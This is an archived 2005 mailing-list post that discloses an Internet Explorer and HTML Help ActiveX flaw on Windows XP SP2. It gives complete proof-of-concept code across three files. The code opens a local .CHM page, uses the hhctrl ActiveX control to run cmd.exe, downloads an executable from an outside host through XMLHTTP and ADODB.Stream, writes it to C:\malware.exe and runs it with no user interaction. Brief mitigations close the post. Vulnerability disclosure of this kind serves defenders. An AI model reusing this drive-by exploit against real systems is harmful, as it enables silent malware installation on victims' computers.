[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050106192711.64118.qmail@web61304.mail.yahoo.com>
From: shreddersub7 at yahoo.com (ShredderSub7)
Subject: Remote Code Execution with Parameters on Windows
(XP SP2)
Remote Code Execution with Parameters on Windows (XP
SP2): Updated (it can now install any malware file
from the Internet and run it without user interaction
needed)
PoC/Exploit:
http://freehost19.websamba.com/shreddersub7/cmdexe.htm
About the PoC/Exploit:
http://freehost19.websamba.com/shreddersub7/cmdexe-d.htm
------------------------
How does this exploit work?
The problem with Internet Explorer is that it doesn't
set any restrictions on web pages that request opening
a Windows Help file, compiled with HTML Help. Without
a
restriction, we can (in Internet Explorer) easily
command to open any local web page stored on a
victim's computer, including web pages that are
founded in Windows Help
files (with extension .CHM). In this PoC (Proof of
Concept, see below for viewing the PoC), the web page
"compile_date.htm" (that is founded in the Windows
Help file
"ntshared.chm") will be opened in HTML Help.
Since we now opened a web page stored in a Windows
Help file (.CHM), it is possible (thanks to the
exploit) to execute an ActiveX control that only fully
works in HTML
Help files. This ActiveX control can do anything: it
can write files to your hard disk and afterwards, it
could execute those files. So in this PoC, we choosed
to
launch an ActiveX control for HTML Help that will
first write the HTML application (.HTA file)
"cmdexe.hta" to your C-drive.
Then, we will execute that file by the same type of
ActiveX control. So in this PoC, it wil execute the
file "C:\cmdexe.hta" after it was written. This HTML
application
"C:\cmdexe.hta" was programmed to install the real
malware onto your C-drive, in this PoC that will be
"C:\malware.exe".
If that is all done, we use the exploit one more time:
we will the execute the malware. It is even possible
to add parameters to the executed program. In this
PoC, we
started the malware file "C:\malware.exe" after it was
written.
To make it complete, we will delete the HTML
application "C:\cmdexe.hta" because it's not being
used anymore. Also, the 2 needed programs (Internet
Explorer and HTML
Help) will be automatically shutted down after the
execution is finished without user interaction.
------------------------
How can you reproduce this PoC?
Create the file "cmdexe.htm" with the following code
(please notice that you may have to change some file
paths!):
<html><head><title>CMDExe - PoC</title></head><body>
<br><OBJECT style="display:none" id="locate"
type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1"
value="command;ms-its:c:/windows/help/ntshared.chm::/compile_date.htm">
</OBJECT>
<OBJECT style="display:none" id="locator"
type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1"
value='command;javascript:execScript("document.write(\"<body
style=\\\"display:none\\\"
scroll=\\\"no\\\"\"+String.fromCharCode(62)+\"<script
language=\\\"javascript\\\"
src=\\\"http://freehost19.websamba.com/shreddersub7/cmdexe.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT>
<script>locate.HHClick();setTimeout("locator.HHClick()",75);setTimeout("window.opener=null;window.close()",7000)</script></body></html>
-----
Then create the file "cmdexe.txt" (please notice that
you may have to change some file paths!):
function writehta(){
document.write("<script language=\"vbscript\"
src=\"http://freehost19.websamba.com/shreddersub7/cmdexe2.txt\"></script>");
}
function writeexe(){
document.write("<object id=a
classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param
name=command value=shortcut><param name=item1
value=',cmd.exe,/d /c start /min
C:/cmdexe.hta'></object><script>a.Click\(\)</script>");
}
function startexe(){
document.write("<object id=b
classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param
name=command value=shortcut><param name=item1
value=',cmd.exe,/d /c del
\"C:/cmdexe.hta\"&&start
C:/malware.exe'></object><object id=c
classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param
name=command
value=close></object><script>b.Click\(\);c.Click\(\)</script>");
}
setTimeout("writehta()",1);
setTimeout("writeexe()",2000);
setTimeout("startexe()",5000);
-----
If that's done, create the file "cmdexe2.txt" (please
notice that you may have to change some file paths!):
on error resume next
set conn = CreateObject("ADODB.Recordset")
With conn
.Fields.Append "conn", 200, "3000"
Call .Open
Call .AddNew
.Fields("conn").Value = "<body
style=""display:none"" scroll=""no"">"
Call .AddNew
.Fields("conn").Value = "<script
language=""vbscript"">: on error resume next : set o =
CreateObject(""msxml2.XMLHTTP"") : o.open
""GET"",""http://freehost19.websamba.com/shreddersub7/cmdexe.exe"",False
: o.send : set s = createobject(""adodb.stream"") :
s.type=1 : s.open : s.write o.responseBody
: s.savetofile ""C:\malware.exe"",2 :
window.close()</script>"
Call .Update
End With
conn.Save "C:\cmdexe.hta", adPersistXML
conn.Close
-----
If you want to use the same test malware file
"cmdexe.exe" (again: only for testing, do not bring
any damage to somewhone's pc with it, or you're
responsible!), you can
find it here:
http://freehost19.websamba.com/shreddersub7/cmdexe.exe
-----
If you want to attack Windows XP RTM (Gold), Windows
XP SP1 or Windows Server 2003 systems, you might have
to upload the "hhctrl.ocx" file too:
http://freehost19.websamba.com/shreddersub7/hhctrl.ocx
------------------------
How to avoid this exploit...
Since there are still no patches from Microsoft
available yet, here are some (temporary?) solutions:
Disable Internet Explorer
or disable Active Scripting.
Use another browser,
for example Mozilla FireFox.
------------------------
To Microsoft: Disable the possibility to integrate
HTML Help Controls in HTML web pages.
Also, disable the possibility to open HTML Help files
randomly out of a HTML web page.
And come on, use some more restricted security zones
for HTML applications!
------------------------
You can find the PoC, as it is explained above, here:
http://freehost19.websamba.com/shreddersub7/cmdexe.htm.
The PoC on this page installs and opens a test malware
file in your C-drive (called "C:\malware.exe"),
nothing more than that. It will not bring any harm to
your pc.
Contact: ShredderSub7_at_yahoo.com (off course,
replace the "_at_" part with an "@" if you want me to
receive your email!)
------------------------
ShredderSub7
__________________________________
Do you Yahoo!?
Yahoo! Mail - Find what you need with new enhanced search.
http://info.mail.yahoo.com/mail_250
Powered by blists - more mailing lists